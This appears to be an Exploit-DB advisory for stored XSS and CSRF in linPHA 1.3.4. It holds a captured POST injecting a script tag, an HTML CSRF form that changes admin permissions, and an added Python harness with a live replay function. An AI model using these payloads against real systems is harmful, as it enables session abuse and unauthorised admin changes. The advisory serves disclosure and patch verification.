Vendor: Linpha
By: killall-9@mail.com
CVSS: 8.8 (HIGH)
Type: Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)
CWE: CWE-79
Product Name: Linpha
Affected Version From: 1.3.4
Affected Version To: 1.3.4
Patch Exists: YES
Related CWE: N/A
CPE: a:linpha:linpha:1.3.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Virtualbox (debian) and Apache
Year: 2014

linPHA 1.3.4 – Permanent XSS and CSRF

The vulnerability exists due to improper validation of user-supplied input in the 'friend_user_name', 'friend_full_name' and 'friend_user_mail' parameters of the 'actions/submit_mod_data.php' script (the proof of concept below injects through 'friend_full_name'). The injected value is stored and later rendered without output encoding, so arbitrary HTML and script code executes in the browser of any user who views the stored value, in the context of the vulnerable website. Note that the captured request is sent from an authenticated administrator session (PHPSESSID cookie, Referer admin.php?page=mysettings): a remote attacker needs such a session, or must get a logged-in user to submit the request for them. The administration forms also carry no anti-CSRF token, so an attacker can have a user with an active session perform actions with that user's privileges simply by inducing them to open a malicious page or click a link.

Mitigation:

Update to version 1.3.5 or later, or apply the patch from the vendor.

Exploit-DB raw data:

# Exploit Title: linPHA 1.3.4 - Permanent XSS and CSRF
# Date: 28/01/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://sourceforge.net/projects/linpha/
# Software Link: http://sourceforge.net/projects/linpha/files/latest/download
# Version: 1.3.4
# Tested on: Virtualbox (debian) and Apache

===[ Exploit ]===

1) Permanent XSS=>
.....
POST /linpha-1.3.4/actions/submit_mod_data.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/linpha-1.3.4/admin.php?page=mysettings
Cookie: PHPSESSID=bbdjarqpmknfpubtnc29rgodu0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

friend_user_name=admin&friend_full_name=%3Cscript%3Ealert%28%22xss+here%22%29%3B%3C%2Fscript%3E&friend_user_mail=admin%40gmail.com&id=1&action=frienduser
.....


2) CSRF (poc)=>
.....
<html>
<head>
<title>Pinata-CSRF-Tool</title>
</head>
<body>
<form action="http://localhost/linpha-1.3.4/admin.php?page=perms&edit=basket_mail&redirector=general" id="formid" method="post">
<input name="who" value="2" />
<input name="and_or" value="0" />
<input name="alb" value="0" />
<input name="change_permissions" value="true" />
<input type="submit" value="Invia"/>
</form>
</body>
</html>
.....

These vulnerabilities were found in the administration panel.
cheerZ.:
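The following Python is an added verification harness for the two findings above; it is not code from the advisory or from linPHA. It rebuilds the stored-XSS POST body from its fields (so it can be compared byte for byte with the captured request, including the Content-Length of 153), classifies whether the stored payload comes back unescaped on a later page, and parses the CSRF proof-of-concept form to show exactly what the victim's browser submits. The sample pages are constructed stand-ins, and the live replay assumes a placeholder base URL, an admin PHPSESSID, and that the friend entry is rendered on admin.php?page=mysettings (the page the captured Referer points at).

```python
"""Offline reproduction/verification helpers for the linPHA 1.3.4 findings
(stored XSS via actions/submit_mod_data.php, CSRF against admin.php?page=perms).
Added example: not code from the advisory or from linPHA. Base URL, PHPSESSID
and the sample page HTML are placeholders / constructed inputs."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

XSS_MARKER = "xss here"
XSS_PAYLOAD = f'<script>alert("{XSS_MARKER}");</script>'


def build_xss_body() -> str:
    """Rebuild the stored-XSS POST body field by field. urlencode() applies the
    same application/x-www-form-urlencoded rules a browser form uses, so the
    result can be diffed byte for byte against the captured request."""
    fields = [
        ("friend_user_name", "admin"),
        ("friend_full_name", XSS_PAYLOAD),      # the injected field
        ("friend_user_mail", "admin@gmail.com"),
        ("id", "1"),
        ("action", "frienduser"),
    ]
    return urlencode(fields)


def xss_verdict(page_html: str) -> str:
    """Classify how the stored friend_full_name is rendered on a later page.
    'unescaped': raw payload present, the script runs (vulnerable)
    'escaped':   survives only as &lt;script&gt;... (output encoding in place)
    'absent':    not on this page at all (wrong page, or value rejected)"""
    if XSS_PAYLOAD in page_html:
        return "unescaped"
    escaped_forms = (
        html.escape(XSS_PAYLOAD, quote=True),    # htmlspecialchars() with quotes encoded
        html.escape(XSS_PAYLOAD, quote=False),   # htmlspecialchars() with ENT_NOQUOTES
    )
    if any(form in page_html for form in escaped_forms):
        return "escaped"
    return "absent"


class _FormParser(HTMLParser):
    """Collect action, method and the named inputs of the first <form>. Enough
    for the PoC above (plain/hidden inputs); it does not model unchecked
    checkboxes, <select> or <textarea>."""

    def __init__(self):
        super().__init__()
        self.action, self.method, self.fields = None, "GET", []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self.action is None:
            self.action = a.get("action", "")
            self.method = a.get("method", "get").upper()
        elif tag == "input" and self.action is not None and a.get("name"):
            self.fields.append((a["name"], a.get("value", "")))


def forged_request(poc_html: str) -> dict:
    """What the victim's browser sends when the CSRF page is opened. The PoC
    works because every field the server checks is a constant the attacker can
    pre-fill; a per-session token the attacker cannot know would break it."""
    parser = _FormParser()
    parser.feed(poc_html)
    return {"method": parser.method, "url": parser.action, "body": urlencode(parser.fields)}


# Constructed sample pages standing in for admin.php?page=mysettings after the POST.
VULNERABLE_PAGE = "<td>" + XSS_PAYLOAD + "</td>"
PATCHED_PAGE = "<td>" + html.escape(XSS_PAYLOAD) + "</td>"

# The CSRF proof of concept from the advisory, verbatim.
CSRF_POC_HTML = """<form action="http://localhost/linpha-1.3.4/admin.php?page=perms&edit=basket_mail&redirector=general" id="formid" method="post">
<input name="who" value="2" />
<input name="and_or" value="0" />
<input name="alb" value="0" />
<input name="change_permissions" value="true" />
<input type="submit" value="Invia"/>
</form>"""


def send_xss_poc(base_url: str, phpsessid: str) -> str:
    """Live replay (needs a logged-in admin PHPSESSID; not exercised offline).
    Assumes the friend entry is shown on admin.php?page=mysettings, the page the
    captured Referer points at; adjust if it is rendered elsewhere."""
    import urllib.request
    headers = {"Cookie": "PHPSESSID=" + phpsessid,
               "Referer": base_url + "/admin.php?page=mysettings"}
    post = urllib.request.Request(base_url + "/actions/submit_mod_data.php",
                                  data=build_xss_body().encode(), headers=headers)
    urllib.request.urlopen(post).read()          # store the payload
    get = urllib.request.Request(base_url + "/admin.php?page=mysettings", headers=headers)
    return xss_verdict(urllib.request.urlopen(get).read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print(build_xss_body())
    print(xss_verdict(VULNERABLE_PAGE), xss_verdict(PATCHED_PAGE))
    print(forged_request(CSRF_POC_HTML))
```

Run it as-is to see the rebuilt request body, the verdicts for the constructed pages, and the forged request; call send_xss_poc("http://localhost/linpha-1.3.4", "<admin PHPSESSID>") against a test install to get the verdict for a real target. After applying the vendor patch the expected verdict is 'escaped', and a form that now carries a per-session hidden token will show up as an extra field in forged_request() that the static PoC cannot know.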